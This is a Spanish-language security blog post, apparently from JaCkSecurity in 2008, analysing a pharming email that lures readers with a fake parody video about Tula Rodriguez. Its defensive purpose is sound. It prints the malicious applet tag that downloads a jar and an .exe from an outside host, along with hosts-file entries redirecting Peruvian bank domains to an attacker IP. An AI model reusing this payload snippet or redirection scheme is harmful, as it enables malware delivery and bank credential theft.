JaCkSecurity ha documentado un pharming que recibiese el martes 13 mayo 2008 (Tue, 13 May 2008 19:02:28 -0400)
EVIDENCIA PRINCIPAL
To: javier@jacksecurity.com
Subject: Video parodia de Tula Rodriguez y su embarazo
From: Maria Isabel
Hola;
Maria te recomienda la siguiente noticia: Video Parodia (burla) de Tula Rodriguez y su embarazo
URL: http://club-classic.nl/noticias/Video_parodia_de_Tula_Rodriguez_y_su_embarazo.html
Mira este video je je, se aprecia a una joven que imita a Tula al mejor estilo de una artista cómica
y cuenta de manera sarcástica el momento de la inusual confesión.
Esperamos que sea de tu agrado.
Saludos,
Análisis principal
Invocación maliciosa:
< a p p l e t name="link" code="Inicio.class" archive="http://boardpix.com/lehigh/content/Crow/ link . jar" height="10" width="1"> < p a r a m name="url" value="http : // boardpix . com /lehigh/content/Crow/xxxxxxxx.exe"> < / applet >
Análisis del binario que trata de instalarse sigilosamente:
http://www.threatexpert.com/report.aspx?md5=d010e2779c2a175ada1d9a548654bbfe
Datos del archivo referido dentro del binario:
72.249.25.219 viabcp.com
72.249.25.219 http://viabcp.com
72.249.25.219 www.viabcp.com
72.249.25.219 pagum.com
72.249.25.219 http://pagum.com
72.249.25.219 www.pagum.com
72.249.25.219 peb1.bbvanetlatam.com
Servidores de terceros afectados en el pharming:
club-classic.nl (donde se aloja la trampa visual)
boardpix.com (donde se aloja el binario)
no-problem.com.mx (donde se aloja las direcciones IP referidas por el binario)
Cabecera del correo original
From – Tue May 13 18:02:58 2008
X-Account-Key: account2
X-UIDL: UID17353-1168226604
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Return-path:
Envelope-to: javier@jacksecurity.com
Delivery-date: Tue, 13 May 2008 19:02:37 -0400
Received: from jsadmin by a2s5.a2hosting.com with local-bsmtp (Exim 4.68)
(envelope-from
id 1Jw3Vs-00025y-Uy
for javier@jacksecurity.com; Tue, 13 May 2008 19:02:37 -0400
X-Spam-Checker-Version: SpamAssassin 3.2.3 (2007-08-08) on a2s5.a2hosting.com
X-Spam-Level: **
X-Spam-Status: No, score=2.8 required=5.0 tests=HTML_MESSAGE,
HTML_MIME_NO_HTML_TAG,MIME_HTML_ONLY,RDNS_NONE autolearn=disabled
version=3.2.3
Received: from [74.53.114.5] (helo=demodocus.site5.com)
by a2s5.a2hosting.com with esmtps (TLSv1:AES256-SHA:256)
(Exim 4.68)
(envelope-from
id 1Jw3Vs-00025g-EC
for javier@jacksecurity.com; Tue, 13 May 2008 19:02:28 -0400
Received: from idham by demodocus.site5.com with local (Exim 4.68)
(envelope-from
id 1Jw3Vd-00032t-Iv
for javier@jacksecurity.com; Tue, 13 May 2008 18:02:13 -0500
To: javier@jacksecurity.com
Subject: Video parodia de Tula Rodriguez y su embarazo
From: Maria Isabel
Content-type: text/html
MIME-Version: 1.0rn
Message-Id:
Date: Tue, 13 May 2008 18:02:13 -0500
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname – demodocus.site5.com
X-AntiAbuse: Original Domain – jacksecurity.com
X-AntiAbuse: Originator/Caller UID/GID – [33075 501] / [47 12]
X-AntiAbuse: Sender Address Domain – demodocus.site5.com
X-Source: /usr/bin/php
X-Source-Args: /usr/bin/php indexx.php
X-Source-Dir: khairilidham.com:/public_html/content
Enlaces de terceros que fueron usados:
http://www.elgonzi.com/2008/05/video-parodia-de-tula-rodriguez-y-su.html
http://www.youtube.com/watch?v=Q4QwiLk183o
Staff
JaCkSecurity
Conocimiento, Conciencia y Consultoría